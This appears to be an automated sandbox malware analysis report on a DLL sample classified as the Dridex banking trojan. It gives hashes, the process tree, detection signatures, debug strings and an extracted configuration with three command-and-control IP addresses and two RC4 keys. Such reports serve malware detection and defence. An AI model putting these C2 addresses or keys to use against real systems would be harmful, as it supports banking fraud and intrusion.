Loading ...

Play interactive tourEdit tour

Analysis Report 0f72be74_by_Libranalysis.dll

Overview

General Information

Sample Name:0f72be74_by_Libranalysis.dll
Analysis ID:413060
MD5:0f72be74fa3f62cdc228d4c3b5d84406
SHA1:66925350b9c8d0919d6eebd6efeab17edac1a3cd
SHA256:3078512d8dc5547c01c07d044be234a69e79456b0480d9c6d8cbf5354b52021e
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Dridex unpacked file
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6632 cmdline: loaddll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6648 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6660 cmdline: rundll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 5888 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 764 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["43.229.206.212:443", "82.209.17.209:8172", "162.241.209.225:4125"], "RC4 keys": ["16dkGStOzdHgjuCciXGdSX7UrHWfYSUG8wEUtKNgzHrWMfTGafJbC", "39t3NdDhurvpltFNCpvA5goSylkxjIBtIwWPTv1DPbNEcuIekQC7O"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.749018753.0000000010001000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    2.2.rundll32.exe.10000000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 2.2.rundll32.exe.10000000.3.unpackMalware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["43.229.206.212:443", "82.209.17.209:8172", "162.241.209.225:4125"], "RC4 keys": ["16dkGStOzdHgjuCciXGdSX7UrHWfYSUG8wEUtKNgzHrWMfTGafJbC", "39t3NdDhurvpltFNCpvA5goSylkxjIBtIwWPTv1DPbNEcuIekQC7O"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: 0f72be74_by_Libranalysis.dllReversingLabs: Detection: 36%
      Machine Learning detection for sampleShow sources
      Source: 0f72be74_by_Libranalysis.dllJoe Sandbox ML: detected
      Source: 0f72be74_by_Libranalysis.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
      Source: 0f72be74_by_Libranalysis.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: dwmapi.pdb2 source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: rasapi32.pdb% source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: ClusApi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.730337205.0000000004E78000.00000004.00000001.sdmp
      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: ClusApi.pdbb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: wUxTheme.pdbd source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: rasman.pdbF source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: mpr.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wsspicli.pdb? source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: combase.pdb1 source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: msctf.pdbL source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.734908197.00000000053F1000.00000004.00000040.sdmp
      Source: Binary string: rasman.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: fpmvppp.pdb source: loaddll32.exe, 00000000.00000002.661654430.0000000010025000.00000002.00020000.sdmp, 0f72be74_by_Libranalysis.dll
      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: iphlpapi.pdb# source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: sfc.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: ole32.pdb) source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorIPs: 43.229.206.212:443
      Source: Malware configuration extractorIPs: 82.209.17.209:8172
      Source: Malware configuration extractorIPs: 162.241.209.225:4125
      Source: Joe Sandbox ViewIP Address: 82.209.17.209 82.209.17.209
      Source: Joe Sandbox ViewIP Address: 162.241.209.225 162.241.209.225
      Source: Joe Sandbox ViewASN Name: PODA-ASCZ PODA-ASCZ
      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
      Source: loaddll32.exe, 00000000.00000002.661599145.00000000012CB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected Dridex unpacked fileShow sources
      Source: Yara matchFile source: 00000002.00000002.749018753.0000000010001000.00000020.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100114602_2_10011460
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1000846C2_2_1000846C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100014942_2_10001494
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1000A52C2_2_1000A52C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10011D582_2_10011D58
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100193482_2_10019348
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100107542_2_10010754
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100090CC2_2_100090CC
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 764
      Source: 0f72be74_by_Libranalysis.dllBinary or memory string: OriginalFilenamex2otfb.dllN vs 0f72be74_by_Libranalysis.dll
      Source: 0f72be74_by_Libranalysis.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
      Source: 0f72be74_by_Libranalysis.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal72.troj.winDLL@6/4@0/3
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6660
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D7.tmpJump to behavior
      Source: 0f72be74_by_Libranalysis.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll',#1
      Source: 0f72be74_by_Libranalysis.dllReversingLabs: Detection: 36%
      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll'
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll',#1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll',#1
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 764
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll',#1Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll',#1Jump to behavior
      Source: 0f72be74_by_Libranalysis.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
      Source: 0f72be74_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: dwmapi.pdb2 source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: rasapi32.pdb% source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: ClusApi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.730337205.0000000004E78000.00000004.00000001.sdmp
      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: ClusApi.pdbb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: wUxTheme.pdbd source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: rasman.pdbF source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: mpr.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wsspicli.pdb? source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: combase.pdb1 source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: msctf.pdbL source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.734908197.00000000053F1000.00000004.00000040.sdmp
      Source: Binary string: rasman.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: fpmvppp.pdb source: loaddll32.exe, 00000000.00000002.661654430.0000000010025000.00000002.00020000.sdmp, 0f72be74_by_Libranalysis.dll
      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.734894194.00000000053E0000.00000004.00000040.sdmp
      Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: iphlpapi.pdb# source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: sfc.pdb source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.734880923.0000000005411000.00000004.00000001.sdmp
      Source: Binary string: ole32.pdb) source: WerFault.exe, 00000009.00000003.734900850.00000000053E6000.00000004.00000040.sdmp
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10006207 push ebx; ret 0_2_10006208
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10004E0F push 822377FAh; iretd 0_2_10004E14
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10005813 push eax; ret 0_2_1000590D
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10006830 push 82235DBAh; iretd 0_2_10006855
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002C33 push 0E950FD0h; iretd 0_2_10002D7C
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000585A push eax; ret 0_2_1000590D
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10005A7B push cs; iretd 0_2_10005B7E
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10006A80 push ebx; iretd 0_2_10006A85
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002C8E push 0E950FD0h; iretd 0_2_10002D7C
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000388E push 8223930Ah; iretd 0_2_10003893
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100048AF push 8223A1AEh; iretd 0_2_100048B4
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100066D0 push 8223737Ah; iretd 0_2_100066D5
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100054EF push 822385B2h; iretd 0_2_100054F4
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000530F push 82230D7Eh; iretd 0_2_10005314
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000574F push 82238352h; iretd 0_2_10005754
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100037A2 push cs; retf 0_2_100037DC
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100039C3 push edi; retf 0_2_100039C4
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10005FD6 push 0E950020h; retf 0_2_10005FDE
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002DF3 push cs; iretd 0_2_10002E7C
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100037F5 push cs; retf 0_2_100037DC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1000F6CC push esi; mov dword ptr [esp], 00000000h2_2_1000F6CD
      Source: initial sampleStatic PE information: section name: .text entropy: 7.53078515147
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: WerFault.exe, 00000009.00000002.746926254.0000000005500000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: WerFault.exe, 00000009.00000002.746208870.0000000004D8A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: WerFault.exe, 00000009.00000002.746926254.0000000005500000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: WerFault.exe, 00000009.00000002.746926254.0000000005500000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
